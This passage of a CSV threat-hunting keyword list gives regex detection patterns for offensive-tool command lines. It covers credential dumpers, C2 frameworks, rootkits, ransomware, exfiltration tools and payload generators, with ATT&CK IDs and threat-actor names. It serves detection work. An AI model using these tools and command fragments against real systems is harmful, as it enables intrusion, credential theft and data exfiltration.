"* pyasn1 *",".{0,1000}\spyasn1\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","2736"
"* pyasn1.*",".{0,1000}\spyasn1\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","2737"
"* PyClone.py*",".{0,1000}\sPyClone\.py.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","2738"
"* pyLAPS.py*",".{0,1000}\spyLAPS\.py.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","0","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","2739"
"* pypykatz*",".{0,1000}\spypykatz.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","2740"
"* pyramid.py *",".{0,1000}\spyramid\.py\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","2741"
"* pyrdp.mitm.*",".{0,1000}\spyrdp\.mitm\..{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","2742"
"* python goldenPac *",".{0,1000}\spython\sgoldenPac\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","2743"
"* pywsus.py *",".{0,1000}\spywsus\.py\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","2744"
"* -q mfsconsole*",".{0,1000}\s\-q\smfsconsole.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","0","N/A","https://x.com/mthcht/status/1827714529687658796","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","2745"
"* -q -r karma.rc_.txt*",".{0,1000}\s\-q\s\-r\skarma\.rc_\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://www.metasploit.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2746"
"* qconn-exec.nse*",".{0,1000}\sqconn\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2747"
"* qscan.nse*",".{0,1000}\sqscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2748"
"* quake1-info.nse*",".{0,1000}\squake1\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2749"
"* quake3-info.nse*",".{0,1000}\squake3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2750"
"* quake3-master-getservers.nse*",".{0,1000}\squake3\-master\-getservers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2751"
"* quickcrack.py*",".{0,1000}\squickcrack\.py.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","2752"
"* QuickViewAD.ps1*",".{0,1000}\sQuickViewAD\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","2753"
"* -r airolib-db /root/wpa.cap*",".{0,1000}\s\-r\sairolib\-db\s\/root\/wpa\.cap.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","2754"
"* -r data/* -p * -m readfiles*portscan*",".{0,1000}\s\-r\sdata\/.{0,1000}\s\-p\s.{0,1000}\s\-m\sreadfiles.{0,1000}portscan.{0,1000}","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","N/A","10","3167","538","2025-02-26T19:39:06Z","2018-10-15T19:08:26Z","2755"
"* -R dnskire:bind *",".{0,1000}\s\-R\sdnskire\:bind\s.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","N/A","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","2756"
"* r77-x64.dll*",".{0,1000}\sr77\-x64\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","2758"
"* r77-x86.dll*",".{0,1000}\sr77\-x86\.dll.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","N/A","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","2759"
"* radare *:* -ble*",".{0,1000}\sradare\s.{0,1000}\:.{0,1000}\s\-ble.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","2760"
"* RagingRotator.go*",".{0,1000}\sRagingRotator\.go.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090 - T1621","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","0","N/A","N/A","10","1","79","7","2024-06-06T19:31:34Z","2023-09-01T15:19:38Z","2761"
"* rai-attack-dns*",".{0,1000}\srai\-attack\-dns.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","2762"
"* rai-attack-http*",".{0,1000}\srai\-attack\-http.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","2763"
"* --random_user_agent*",".{0,1000}\s\-\-random_user_agent.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","2764"
"* --random-agent *",".{0,1000}\s\-\-random\-agent\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","2765"
"* RANSOM_NOTE.txt*",".{0,1000}\sRANSOM_NOTE\.txt.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2766"
"* --ransom-note-name *",".{0,1000}\s\-\-ransom\-note\-name\s.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","2767"
"* rapid7/msf-ubuntu*",".{0,1000}\srapid7\/msf\-ubuntu.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","0","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","2768"
"* rarce.py*",".{0,1000}\srarce\.py.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","N/A","9","2","115","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z","2769"
"* rasman.exe*",".{0,1000}\srasman\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","2770"
"* -ratel *",".{0,1000}\s\-ratel\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","2771"
"* Rattler.exe*",".{0,1000}\sRattler\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2773"
"* Rattler_32.exe*",".{0,1000}\sRattler_32\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2774"
"* Rattler_x64.exe*",".{0,1000}\sRattler_x64\.exe.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","2775"
"* rawrpc_embedded.py*",".{0,1000}\srawrpc_embedded\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","2776"
"* --rawscfile ./x86payload.bin*",".{0,1000}\s\-\-rawscfile\s\.\/x86payload\.bin.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#linux","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","2777"
"* RBCD -action write -delegate-to * -delegate-from *",".{0,1000}\sRBCD\s\-action\swrite\s\-delegate\-to\s.{0,1000}\s\-delegate\-from\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","2778"
"* rce.php /var*",".{0,1000}\srce\.php\s\/var.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","2779"
"* RCE.py -*",".{0,1000}\sRCE\.py\s\-.{0,1000}","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Exploitation tool","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","2780"
"* --rdcman-poison-hkcr*",".{0,1000}\s\-\-rdcman\-poison\-hkcr.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","2781"
"* rde1 crde_windows*",".{0,1000}\srde1\scrde_windows.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2782"
"* rde1 srde_linux*",".{0,1000}\srde1\ssrde_linux.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","#linux","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2783"
"* rde1 srde_macos*",".{0,1000}\srde1\ssrde_macos.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","2784"
